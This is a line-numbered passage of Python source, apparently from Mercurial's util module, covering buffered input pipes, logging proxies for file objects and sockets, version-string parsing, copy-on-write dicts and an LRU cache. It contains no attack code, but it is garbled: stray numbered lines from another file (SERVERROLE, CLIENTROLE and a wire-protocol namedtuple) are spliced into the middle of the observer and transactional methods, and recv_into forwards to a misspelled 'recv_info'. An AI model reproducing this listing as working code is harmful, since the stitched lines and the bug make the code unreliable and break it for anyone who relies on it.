275 return memoryview(sliceable)[offset:]
276
277 _chunksize = 4096
278
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
285
286 This class let us work around that by implementing its own buffering
287 (allowing efficient readline) while offering a way to know if the buffer is
288 empty from the output (allowing collaboration of the buffer with polling).
289
290 This class lives in the 'util' module because it makes use of the 'os'
291 module from the python stdlib.
292 """
293 def __new__(cls, fh):
294 # If we receive a fileobjectproxy, we need to use a variation of this
295 # class that notifies observers about activity.
296 if isinstance(fh, fileobjectproxy):
297 cls = observedbufferedinputpipe
298
299 return super(bufferedinputpipe, cls).__new__(cls)
300
301 def __init__(self, input):
302 self._input = input
303 self._buffer = []
304 self._eof = False
305 self._lenbuf = 0
306
307 @property
308 def hasbuffer(self):
309 """True is any data is currently buffered
310
311 This will be used externally a pre-step for polling IO. If there is
312 already data then no polling should be set in place."""
313 return bool(self._buffer)
314
315 @property
316 def closed(self):
317 return self._input.closed
318
319 def fileno(self):
320 return self._input.fileno()
321
322 def close(self):
323 return self._input.close()
324
325 def read(self, size):
326 while (not self._eof) and (self._lenbuf < size):
327 self._fillbuffer()
328 return self._frombuffer(size)
329
330 def unbufferedread(self, size):
331 if not self._eof and self._lenbuf == 0:
332 self._fillbuffer(max(size, _chunksize))
333 return self._frombuffer(min(self._lenbuf, size))
334
335 def readline(self, *args, **kwargs):
336 if len(self._buffer) > 1:
337 # this should not happen because both read and readline end with a
338 # _frombuffer call that collapse it.
339 self._buffer = [''.join(self._buffer)]
340 self._lenbuf = len(self._buffer[0])
341 lfi = -1
342 if self._buffer:
343 lfi = self._buffer[-1].find('\n')
344 while (not self._eof) and lfi < 0:
345 self._fillbuffer()
346 if self._buffer:
347 lfi = self._buffer[-1].find('\n')
348 size = lfi + 1
349 if lfi < 0: # end of file
350 size = self._lenbuf
351 elif len(self._buffer) > 1:
352 # we need to take previous chunks into account
353 size += self._lenbuf - len(self._buffer[-1])
354 return self._frombuffer(size)
355
356 def _frombuffer(self, size):
357 """return at most 'size' data from the buffer
358
359 The data are removed from the buffer."""
360 if size == 0 or not self._buffer:
361 return ''
362 buf = self._buffer[0]
363 if len(self._buffer) > 1:
364 buf = ''.join(self._buffer)
365
366 data = buf[:size]
367 buf = buf[len(data):]
368 if buf:
369 self._buffer = [buf]
370 self._lenbuf = len(buf)
371 else:
372 self._buffer = []
373 self._lenbuf = 0
374 return data
375
376 def _fillbuffer(self, size=_chunksize):
377 """read data to the buffer"""
378 data = os.read(self._input.fileno(), size)
379 if not data:
380 self._eof = True
381 else:
382 self._lenbuf += len(data)
383 self._buffer.append(data)
384
385 return data
386
387 def mmapread(fp):
388 try:
389 fd = getattr(fp, 'fileno', lambda: fp)()
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 except ValueError:
392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 # if the file is empty, and if so, return an empty buffer.
394 if os.fstat(fd).st_size == 0:
395 return ''
396 raise
397
398 class fileobjectproxy(object):
399 """A proxy around file objects that tells a watcher when events occur.
400
401 This type is intended to only be used for testing purposes. Think hard
402 before using it in important code.
403 """
404 __slots__ = (
405 r'_orig',
406 r'_observer',
407 )
408
409 def __init__(self, fh, observer):
410 object.__setattr__(self, r'_orig', fh)
411 object.__setattr__(self, r'_observer', observer)
412
413 def __getattribute__(self, name):
414 ours = {
415 r'_observer',
416
417 # IOBase
418 r'close',
419 # closed if a property
420 r'fileno',
421 r'flush',
422 r'isatty',
423 r'readable',
424 r'readline',
425 r'readlines',
426 r'seek',
427 r'seekable',
428 r'tell',
429 r'truncate',
430 r'writable',
431 r'writelines',
432 # RawIOBase
433 r'read',
434 r'readall',
435 r'readinto',
436 r'write',
437 # BufferedIOBase
438 # raw is a property
439 r'detach',
440 # read defined above
441 r'read1',
442 # readinto defined above
443 # write defined above
444 }
445
446 # We only observe some methods.
447 if name in ours:
448 return object.__getattribute__(self, name)
449
450 return getattr(object.__getattribute__(self, r'_orig'), name)
451
452 def __nonzero__(self):
453 return bool(object.__getattribute__(self, r'_orig'))
454
455 __bool__ = __nonzero__
456
457 def __delattr__(self, name):
458 return delattr(object.__getattribute__(self, r'_orig'), name)
459
460 def __setattr__(self, name, value):
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462
463 def __iter__(self):
464 return object.__getattribute__(self, r'_orig').__iter__()
465
466 def _observedcall(self, name, *args, **kwargs):
467 # Call the original object.
468 orig = object.__getattribute__(self, r'_orig')
469 res = getattr(orig, name)(*args, **kwargs)
470
471 # Call a method on the observer of the same name with arguments
472 # so it can react, log, etc.
473 observer = object.__getattribute__(self, r'_observer')
474 fn = getattr(observer, name, None)
475 if fn:
476 fn(res, *args, **kwargs)
477
478 return res
479
480 def close(self, *args, **kwargs):
481 return object.__getattribute__(self, r'_observedcall')(
482 r'close', *args, **kwargs)
483
484 def fileno(self, *args, **kwargs):
485 return object.__getattribute__(self, r'_observedcall')(
486 r'fileno', *args, **kwargs)
487
488 def flush(self, *args, **kwargs):
489 return object.__getattribute__(self, r'_observedcall')(
490 r'flush', *args, **kwargs)
491
492 def isatty(self, *args, **kwargs):
493 return object.__getattribute__(self, r'_observedcall')(
494 r'isatty', *args, **kwargs)
495
496 def readable(self, *args, **kwargs):
497 return object.__getattribute__(self, r'_observedcall')(
498 r'readable', *args, **kwargs)
499
500 def readline(self, *args, **kwargs):
501 return object.__getattribute__(self, r'_observedcall')(
502 r'readline', *args, **kwargs)
503
504 def readlines(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
506 r'readlines', *args, **kwargs)
507
508 def seek(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
510 r'seek', *args, **kwargs)
511
512 def seekable(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
514 r'seekable', *args, **kwargs)
515
516 def tell(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
518 r'tell', *args, **kwargs)
519
520 def truncate(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
522 r'truncate', *args, **kwargs)
523
524 def writable(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
526 r'writable', *args, **kwargs)
527
528 def writelines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
530 r'writelines', *args, **kwargs)
531
532 def read(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
534 r'read', *args, **kwargs)
535
536 def readall(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
538 r'readall', *args, **kwargs)
539
540 def readinto(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
542 r'readinto', *args, **kwargs)
543
544 def write(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
546 r'write', *args, **kwargs)
547
548 def detach(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
550 r'detach', *args, **kwargs)
551
552 def read1(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
554 r'read1', *args, **kwargs)
555
556 class observedbufferedinputpipe(bufferedinputpipe):
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 bypass ``fileobjectproxy``. Because of this, we need to make
561 ``bufferedinputpipe`` aware of these operations.
562
563 This variation of ``bufferedinputpipe`` can notify observers about
564 ``os.read()`` events. It also re-publishes other events, such as
565 ``read()`` and ``readline()``.
566 """
567 def _fillbuffer(self):
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569
570 fn = getattr(self._input._observer, r'osread', None)
571 if fn:
572 fn(res, _chunksize)
573
574 return res
575
576 # We use different observer methods because the operation isn't
577 # performed on the actual file object but on us.
578 def read(self, size):
579 res = super(observedbufferedinputpipe, self).read(size)
580
581 fn = getattr(self._input._observer, r'bufferedread', None)
582 if fn:
583 fn(res, size)
584
585 return res
586
587 def readline(self, *args, **kwargs):
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 if fn:
592 fn(res)
593
594 return res
595
596 PROXIED_SOCKET_METHODS = {
597 r'makefile',
598 r'recv',
599 r'recvfrom',
600 r'recvfrom_into',
601 r'recv_into',
602 r'send',
603 r'sendall',
604 r'sendto',
605 r'setblocking',
606 r'settimeout',
607 r'gettimeout',
608 r'setsockopt',
609 }
610
611 class socketproxy(object):
612 """A proxy around a socket that tells a watcher when events occur.
613
614 This is like ``fileobjectproxy`` except for sockets.
615
616 This type is intended to only be used for testing purposes. Think hard
617 before using it in important code.
618 """
619 __slots__ = (
620 r'_orig',
621 r'_observer',
622 )
623
624 def __init__(self, sock, observer):
625 object.__setattr__(self, r'_orig', sock)
626 object.__setattr__(self, r'_observer', observer)
627
628 def __getattribute__(self, name):
629 if name in PROXIED_SOCKET_METHODS:
630 return object.__getattribute__(self, name)
631
632 return getattr(object.__getattribute__(self, r'_orig'), name)
633
634 def __delattr__(self, name):
635 return delattr(object.__getattribute__(self, r'_orig'), name)
636
637 def __setattr__(self, name, value):
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639
640 def __nonzero__(self):
641 return bool(object.__getattribute__(self, r'_orig'))
642
643 __bool__ = __nonzero__
644
645 def _observedcall(self, name, *args, **kwargs):
646 # Call the original object.
647 orig = object.__getattribute__(self, r'_orig')
648 res = getattr(orig, name)(*args, **kwargs)
649
650 # Call a method on the observer of the same name with arguments
651 # so it can react, log, etc.
652 observer = object.__getattribute__(self, r'_observer')
653 fn = getattr(observer, name, None)
654 if fn:
655 fn(res, *args, **kwargs)
656
657 return res
658
659 def makefile(self, *args, **kwargs):
660 res = object.__getattribute__(self, r'_observedcall')(
661 r'makefile', *args, **kwargs)
662
663 # The file object may be used for I/O. So we turn it into a
664 # proxy using our observer.
665 observer = object.__getattribute__(self, r'_observer')
666 return makeloggingfileobject(observer.fh, res, observer.name,
667 reads=observer.reads,
668 writes=observer.writes,
669 logdata=observer.logdata,
670 logdataapis=observer.logdataapis)
671
672 def recv(self, *args, **kwargs):
673 return object.__getattribute__(self, r'_observedcall')(
674 r'recv', *args, **kwargs)
675
676 def recvfrom(self, *args, **kwargs):
677 return object.__getattribute__(self, r'_observedcall')(
678 r'recvfrom', *args, **kwargs)
679
680 def recvfrom_into(self, *args, **kwargs):
681 return object.__getattribute__(self, r'_observedcall')(
682 r'recvfrom_into', *args, **kwargs)
683
684 def recv_into(self, *args, **kwargs):
685 return object.__getattribute__(self, r'_observedcall')(
686 r'recv_info', *args, **kwargs)
687
688 def send(self, *args, **kwargs):
689 return object.__getattribute__(self, r'_observedcall')(
690 r'send', *args, **kwargs)
691
692 def sendall(self, *args, **kwargs):
693 return object.__getattribute__(self, r'_observedcall')(
694 r'sendall', *args, **kwargs)
695
696 def sendto(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
698 r'sendto', *args, **kwargs)
699
700 def setblocking(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
702 r'setblocking', *args, **kwargs)
703
704 def settimeout(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
706 r'settimeout', *args, **kwargs)
707
708 def gettimeout(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
710 r'gettimeout', *args, **kwargs)
711
712 def setsockopt(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
714 r'setsockopt', *args, **kwargs)
715
716 class baseproxyobserver(object):
717 def _writedata(self, data):
718 if not self.logdata:
719 if self.logdataapis:
720 self.fh.write('\n')
721 self.fh.flush()
722 return
723
724 # Simple case writes all data on a single line.
725 if b'\n' not in data:
726 if self.logdataapis:
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 else:
729 self.fh.write('%s> %s\n'
730 % (self.name, stringutil.escapestr(data)))
731 self.fh.flush()
732 return
733
734 # Data with newlines is written to multiple lines.
735 if self.logdataapis:
736 self.fh.write(':\n')
737
738 lines = data.splitlines(True)
739 for line in lines:
740 self.fh.write('%s> %s\n'
741 % (self.name, stringutil.escapestr(line)))
742 self.fh.flush()
743
744 class fileobjectobserver(baseproxyobserver):
745 """Logs file object activity."""
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 logdataapis=True):
748 self.fh = fh
749 self.name = name
750 self.logdata = logdata
751 self.logdataapis = logdataapis
752 self.reads = reads
753 self.writes = writes
754
755 def read(self, res, size=-1):
756 if not self.reads:
757 return
758 # Python 3 can return None from reads at EOF instead of empty strings.
759 if res is None:
760 res = ''
761
762 if size == -1 and res == '':
763 # Suppress pointless read(-1) calls that return
764 # nothing. These happen _a lot_ on Python 3, and there
765 # doesn't seem to be a better workaround to have matching
766 # Python 2 and 3 behavior. :(
767 return
768
769 if self.logdataapis:
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771
772 self._writedata(res)
773
774 def readline(self, res, limit=-1):
775 if not self.reads:
776 return
777
778 if self.logdataapis:
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780
781 self._writedata(res)
782
783 def readinto(self, res, dest):
784 if not self.reads:
785 return
786
787 if self.logdataapis:
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 res))
790
791 data = dest[0:res] if res is not None else b''
792
793 # _writedata() uses "in" operator and is confused by memoryview because
794 # characters are ints on Python 3.
795 if isinstance(data, memoryview):
796 data = data.tobytes()
797
798 self._writedata(data)
799
800 def write(self, res, data):
801 if not self.writes:
802 return
803
804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
805 # returns the integer bytes written.
806 if res is None and data:
807 res = len(data)
808
809 if self.logdataapis:
810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
811
812 self._writedata(data)
813
814 def flush(self, res):
815 if not self.writes:
816 return
817
818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
819
28
820 # For observedbufferedinputpipe.
29 SERVERROLE = 'server'
821 def bufferedread(self, res, size):
30 CLIENTROLE = 'client'
822 if not self.reads:
823 return
824
825 if self.logdataapis:
826 self.fh.write('%s> bufferedread(%d) -> %d' % (
827 self.name, size, len(res)))
828
829 self._writedata(res)
830
831 def bufferedreadline(self, res):
832 if not self.reads:
833 return
834
835 if self.logdataapis:
836 self.fh.write('%s> bufferedreadline() -> %d' % (
837 self.name, len(res)))
838
839 self._writedata(res)
840
841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
842 logdata=False, logdataapis=True):
843 """Turn a file object into a logging file object."""
844
845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
846 logdata=logdata, logdataapis=logdataapis)
847 return fileobjectproxy(fh, observer)
848
849 class socketobserver(baseproxyobserver):
850 """Logs socket activity."""
851 def __init__(self, fh, name, reads=True, writes=True, states=True,
852 logdata=False, logdataapis=True):
853 self.fh = fh
854 self.name = name
855 self.reads = reads
856 self.writes = writes
857 self.states = states
858 self.logdata = logdata
859 self.logdataapis = logdataapis
860
861 def makefile(self, res, mode=None, bufsize=None):
862 if not self.states:
863 return
864
865 self.fh.write('%s> makefile(%r, %r)\n' % (
866 self.name, mode, bufsize))
867
868 def recv(self, res, size, flags=0):
869 if not self.reads:
870 return
871
872 if self.logdataapis:
873 self.fh.write('%s> recv(%d, %d) -> %d' % (
874 self.name, size, flags, len(res)))
875 self._writedata(res)
876
877 def recvfrom(self, res, size, flags=0):
878 if not self.reads:
879 return
880
881 if self.logdataapis:
882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
883 self.name, size, flags, len(res[0])))
884
885 self._writedata(res[0])
886
887 def recvfrom_into(self, res, buf, size, flags=0):
888 if not self.reads:
889 return
890
891 if self.logdataapis:
892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
893 self.name, size, flags, res[0]))
894
895 self._writedata(buf[0:res[0]])
896
897 def recv_into(self, res, buf, size=0, flags=0):
898 if not self.reads:
899 return
900
901 if self.logdataapis:
902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
903 self.name, size, flags, res))
904
905 self._writedata(buf[0:res])
906
907 def send(self, res, data, flags=0):
908 if not self.writes:
909 return
910
911 self.fh.write('%s> send(%d, %d) -> %d' % (
912 self.name, len(data), flags, len(res)))
913 self._writedata(data)
914
915 def sendall(self, res, data, flags=0):
916 if not self.writes:
917 return
918
919 if self.logdataapis:
920 # Returns None on success. So don't bother reporting return value.
921 self.fh.write('%s> sendall(%d, %d)' % (
922 self.name, len(data), flags))
923
924 self._writedata(data)
925
926 def sendto(self, res, data, flagsoraddress, address=None):
927 if not self.writes:
928 return
929
930 if address:
931 flags = flagsoraddress
932 else:
933 flags = 0
934
935 if self.logdataapis:
936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
937 self.name, len(data), flags, address, res))
938
939 self._writedata(data)
940
941 def setblocking(self, res, flag):
942 if not self.states:
943 return
944
945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
946
947 def settimeout(self, res, value):
948 if not self.states:
949 return
950
951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
952
953 def gettimeout(self, res):
954 if not self.states:
955 return
956
957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
958
959 def setsockopt(self, res, level, optname, value):
960 if not self.states:
961 return
962
963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
964 self.name, level, optname, value, res))
965
966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
967 logdata=False, logdataapis=True):
968 """Turn a socket into a logging socket."""
969
970 observer = socketobserver(logh, name, reads=reads, writes=writes,
971 states=states, logdata=logdata,
972 logdataapis=logdataapis)
973 return socketproxy(fh, observer)
974
975 def version():
976 """Return version information if available."""
977 try:
978 from . import __version__
979 return __version__.version
980 except ImportError:
981 return 'unknown'
982
983 def versiontuple(v=None, n=4):
984 """Parses a Mercurial version string into an N-tuple.
985
986 The version string to be parsed is specified with the ``v`` argument.
987 If it isn't defined, the current Mercurial version string will be parsed.
988
989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
990 returned values:
991
992 >>> v = b'3.6.1+190-df9b73d2d444'
993 >>> versiontuple(v, 2)
994 (3, 6)
995 >>> versiontuple(v, 3)
996 (3, 6, 1)
997 >>> versiontuple(v, 4)
998 (3, 6, 1, '190-df9b73d2d444')
999
1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1001 (3, 6, 1, '190-df9b73d2d444+20151118')
1002
1003 >>> v = b'3.6'
1004 >>> versiontuple(v, 2)
1005 (3, 6)
1006 >>> versiontuple(v, 3)
1007 (3, 6, None)
1008 >>> versiontuple(v, 4)
1009 (3, 6, None, None)
1010
1011 >>> v = b'3.9-rc'
1012 >>> versiontuple(v, 2)
1013 (3, 9)
1014 >>> versiontuple(v, 3)
1015 (3, 9, None)
1016 >>> versiontuple(v, 4)
1017 (3, 9, None, 'rc')
1018
1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1020 >>> versiontuple(v, 2)
1021 (3, 9)
1022 >>> versiontuple(v, 3)
1023 (3, 9, None)
1024 >>> versiontuple(v, 4)
1025 (3, 9, None, 'rc+2-02a8fea4289b')
1026
1027 >>> versiontuple(b'4.6rc0')
1028 (4, 6, None, 'rc0')
1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1030 (4, 6, None, 'rc0+12-425d55e54f98')
1031 >>> versiontuple(b'.1.2.3')
1032 (None, None, None, '.1.2.3')
1033 >>> versiontuple(b'12.34..5')
1034 (12, 34, None, '..5')
1035 >>> versiontuple(b'1.2.3.4.5.6')
1036 (1, 2, 3, '.4.5.6')
1037 """
1038 if not v:
1039 v = version()
1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1041 if not m:
1042 vparts, extra = '', v
1043 elif m.group(2):
1044 vparts, extra = m.groups()
1045 else:
1046 vparts, extra = m.group(1), None
1047
1048 vints = []
1049 for i in vparts.split('.'):
1050 try:
1051 vints.append(int(i))
1052 except ValueError:
1053 break
1054 # (3, 6) -> (3, 6, None)
1055 while len(vints) < 3:
1056 vints.append(None)
1057
1058 if n == 2:
1059 return (vints[0], vints[1])
1060 if n == 3:
1061 return (vints[0], vints[1], vints[2])
1062 if n == 4:
1063 return (vints[0], vints[1], vints[2], extra)
1064
1065 def cachefunc(func):
1066 '''cache the result of function calls'''
1067 # XXX doesn't handle keywords args
1068 if func.__code__.co_argcount == 0:
1069 cache = []
1070 def f():
1071 if len(cache) == 0:
1072 cache.append(func())
1073 return cache[0]
1074 return f
1075 cache = {}
1076 if func.__code__.co_argcount == 1:
1077 # we gain a small amount of time because
1078 # we don't need to pack/unpack the list
1079 def f(arg):
1080 if arg not in cache:
1081 cache[arg] = func(arg)
1082 return cache[arg]
1083 else:
1084 def f(*args):
1085 if args not in cache:
1086 cache[args] = func(*args)
1087 return cache[args]
1088
1089 return f
1090
1091 class cow(object):
1092 """helper class to make copy-on-write easier
1093
1094 Call preparewrite before doing any writes.
1095 """
1096
1097 def preparewrite(self):
1098 """call this before writes, return self or a copied new object"""
1099 if getattr(self, '_copied', 0):
1100 self._copied -= 1
1101 return self.__class__(self)
1102 return self
1103
1104 def copy(self):
1105 """always do a cheap copy"""
1106 self._copied = getattr(self, '_copied', 0) + 1
1107 return self
1108
1109 class sortdict(collections.OrderedDict):
1110 '''a simple sorted dictionary
1111
1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1113 >>> d2 = d1.copy()
1114 >>> d2
1115 sortdict([('a', 0), ('b', 1)])
1116 >>> d2.update([(b'a', 2)])
1117 >>> list(d2.keys()) # should still be in last-set order
1118 ['b', 'a']
1119 '''
1120
1121 def __setitem__(self, key, value):
1122 if key in self:
1123 del self[key]
1124 super(sortdict, self).__setitem__(key, value)
1125
1126 if pycompat.ispypy:
1127 # __setitem__() isn't called as of PyPy 5.8.0
1128 def update(self, src):
1129 if isinstance(src, dict):
1130 src = src.iteritems()
1131 for k, v in src:
1132 self[k] = v
1133
1134 class cowdict(cow, dict):
1135 """copy-on-write dict
1136
1137 Be sure to call d = d.preparewrite() before writing to d.
1138
1139 >>> a = cowdict()
1140 >>> a is a.preparewrite()
1141 True
1142 >>> b = a.copy()
1143 >>> b is a
1144 True
1145 >>> c = b.copy()
1146 >>> c is a
1147 True
1148 >>> a = a.preparewrite()
1149 >>> b is a
1150 False
1151 >>> a is a.preparewrite()
1152 True
1153 >>> c = c.preparewrite()
1154 >>> b is c
1155 False
1156 >>> b is b.preparewrite()
1157 True
1158 """
1159
1160 class cowsortdict(cow, sortdict):
1161 """copy-on-write sortdict
1162
1163 Be sure to call d = d.preparewrite() before writing to d.
1164 """
1165
1166 class transactional(object):
1167 """Base class for making a transactional type into a context manager."""
1168 __metaclass__ = abc.ABCMeta
1169
1170 @abc.abstractmethod
1171 def close(self):
1172 """Successfully closes the transaction."""
1173
1174 @abc.abstractmethod
1175 def release(self):
1176 """Marks the end of the transaction.
1177
1178 If the transaction has not been closed, it will be aborted.
1179 """
1180
1181 def __enter__(self):
1182 return self
1183
31
1184 def __exit__(self, exc_type, exc_val, exc_tb):
32 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
1185 try:
33 (r'name', r'serverpriority',
1186 if exc_type is None:
34 r'clientpriority'))
1187 self.close()
1188 finally:
1189 self.release()
1190
1191 @contextlib.contextmanager
1192 def acceptintervention(tr=None):
1193 """A context manager that closes the transaction on InterventionRequired
1194
1195 If no transaction was provided, this simply runs the body and returns
1196 """
1197 if not tr:
1198 yield
1199 return
1200 try:
1201 yield
1202 tr.close()
1203 except error.InterventionRequired:
1204 tr.close()
1205 raise
1206 finally:
1207 tr.release()
1208
1209 @contextlib.contextmanager
1210 def nullcontextmanager():
1211 yield
1212
1213 class _lrucachenode(object):
1214 """A node in a doubly linked list.
1215
1216 Holds a reference to nodes on either side as well as a key-value
1217 pair for the dictionary entry.
1218 """
1219 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1220
1221 def __init__(self):
1222 self.next = None
1223 self.prev = None
1224
1225 self.key = _notset
1226 self.value = None
1227 self.cost = 0
1228
1229 def markempty(self):
1230 """Mark the node as emptied."""
1231 self.key = _notset
1232 self.value = None
1233 self.cost = 0
1234
1235 class lrucachedict(object):
1236 """Dict that caches most recent accesses and sets.
1237
1238 The dict consists of an actual backing dict - indexed by original
1239 key - and a doubly linked circular list defining the order of entries in
1240 the cache.
1241
1242 The head node is the newest entry in the cache. If the cache is full,
1243 we recycle head.prev and make it the new head. Cache accesses result in
1244 the node being moved to before the existing head and being marked as the
1245 new head node.
1246
1247 Items in the cache can be inserted with an optional "cost" value. This is
1248 simply an integer that is specified by the caller. The cache can be queried
1249 for the total cost of all items presently in the cache.
1250
1251 The cache can also define a maximum cost. If a cache insertion would
1252 cause the total cost of the cache to go beyond the maximum cost limit,
1253 nodes will be evicted to make room for the new code. This can be used
1254 to e.g. set a max memory limit and associate an estimated bytes size
1255 cost to each item in the cache. By default, no maximum cost is enforced.
1256 """
1257 def __init__(self, max, maxcost=0):
1258 self._cache = {}
1259
1260 self._head = head = _lrucachenode()
1261 head.prev = head
1262 head.next = head
1263 self._size = 1
1264 self.capacity = max
1265 self.totalcost = 0
1266 self.maxcost = maxcost
1267
1268 def __len__(self):
1269 return len(self._cache)
1270
1271 def __contains__(self, k):
1272 return k in self._cache
1273
1274 def __iter__(self):
1275 # We don't have to iterate in cache order, but why not.
1276 n = self._head
1277 for i in range(len(self._cache)):
1278 yield n.key
1279 n = n.next
1280
1281 def __getitem__(self, k):
1282 node = self._cache[k]
1283 self._movetohead(node)
1284 return node.value
1285
1286 def insert(self, k, v, cost=0):
1287 """Insert a new item in the cache with optional cost value."""
1288 node = self._cache.get(k)
1289 # Replace existing value and mark as newest.
1290 if node is not None:
1291 self.totalcost -= node.cost
1292 node.value = v
1293 node.cost = cost
1294 self.totalcost += cost
1295 self._movetohead(node)
1296
1297 if self.maxcost:
1298 self._enforcecostlimit()
1299
1300 return
1301
1302 if self._size < self.capacity:
1303 node = self._addcapacity()
1304 else:
1305 # Grab the last/oldest item.
1306 node = self._head.prev
1307
1308 # At capacity. Kill the old entry.
1309 if node.key is not _notset:
1310 self.totalcost -= node.cost
1311 del self._cache[node.key]
1312
1313 node.key = k
1314 node.value = v
1315 node.cost = cost
1316 self.totalcost += cost
1317 self._cache[k] = node
1318 # And mark it as newest entry. No need to adjust order since it
1319 # is already self._head.prev.
1320 self._head = node
1321
1322 if self.maxcost:
1323 self._enforcecostlimit()
1324
1325 def __setitem__(self, k, v):
1326 self.insert(k, v)
1327
1328 def __delitem__(self, k):
1329 self.pop(k)
1330
1331 def pop(self, k, default=_notset):
1332 try:
1333 node = self._cache.pop(k)
1334 except KeyError:
1335 if default is _notset:
1336 raise
1337 return default
1338 value = node.value
1339 self.totalcost -= node.cost
1340 node.markempty()
1341
1342 # Temporarily mark as newest item before re-adjusting head to make
1343 # this node the oldest item.
1344 self._movetohead(node)
1345 self._head = node.next
1346
1347 return value
1348
1349 # Additional dict methods.
1350
1351 def get(self, k, default=None):
1352 try:
1353 return self.__getitem__(k)
1354 except KeyError:
1355 return default
1356
1357 def peek(self, k, default=_notset):
1358 """Get the specified item without moving it to the head
1359
1360 Unlike get(), this doesn't mutate the internal state. But be aware
1361 that it doesn't mean peek() is thread safe.
1362 """
1363 try:
1364 node = self._cache[k]
1365 return node.value
1366 except KeyError:
1367 if default is _notset:
1368 raise
1369 return default
1370
1371 def clear(self):
1372 n = self._head
1373 while n.key is not _notset:
1374 self.totalcost -= n.cost
1375 n.markempty()
1376 n = n.next
1377
1378 self._cache.clear()
1379
1380 def copy(self, capacity=None, maxcost=0):
1381 """Create a new cache as a copy of the current one.
1382
1383 By default, the new cache has the same capacity as the existing one.
1384 But, the cache capacity can be changed as part of performing the
1385 copy.
1386
1387 Items in the copy have an insertion/access order matching this
1388 instance.
1389 """
1390
1391 capacity = capacity or self.capacity
1392 maxcost = maxcost or self.maxcost
1393 result = lrucachedict(capacity, maxcost=maxcost)
1394
1395 # We copy entries by iterating in oldest-to-newest order so the copy
1396 # has the correct ordering.
1397
1398 # Find the first non-empty entry.
1399 n = self._head.prev
1400 while n.key is _notset and n is not self._head:
1401 n = n.prev
1402
1403 # We could potentially skip the first N items when decreasing capacity.
1404 # But let's keep it simple unless it is a performance problem.
1405 for i in range(len(self._cache)):
1406 result.insert(n.key, n.value, cost=n.cost)
1407 n = n.prev
1408
1409 return result
1410
1411 def popoldest(self):
1412 """Remove the oldest item from the cache.
1413
1414 Returns the (key, value) describing the removed cache entry.
1415 """
1416 if not self._cache:
1417 return
1418
1419 # Walk the linked list backwards starting at tail node until we hit
1420 # a non-empty node.
1421 n = self._head.prev
1422 while n.key is _notset:
1423 n = n.prev
1424
1425 key, value = n.key, n.value
1426
1427 # And remove it from the cache and mark it as empty.
1428 del self._cache[n.key]
1429 self.totalcost -= n.cost
1430 n.markempty()
1431
1432 return key, value
1433
1434 def _movetohead(self, node):
1435 """Mark a node as the newest, making it the new head.
1436
1437 When a node is accessed, it becomes the freshest entry in the LRU
1438 list, which is denoted by self._head.
1439
1440 Visually, let's make ``N`` the new head node (* denotes head):
1441
1442 previous/oldest <-> head <-> next/next newest
1443
1444 ----<->--- A* ---<->-----
1445 | |
1446 E <-> D <-> N <-> C <-> B
1447
1448 To:
1449
1450 ----<->--- N* ---<->-----
1451 | |
1452 E <-> D <-> C <-> B <-> A
1453
1454 This requires the following moves:
1455
1456 C.next = D (node.prev.next = node.next)
1457 D.prev = C (node.next.prev = node.prev)
1458 E.next = N (head.prev.next = node)
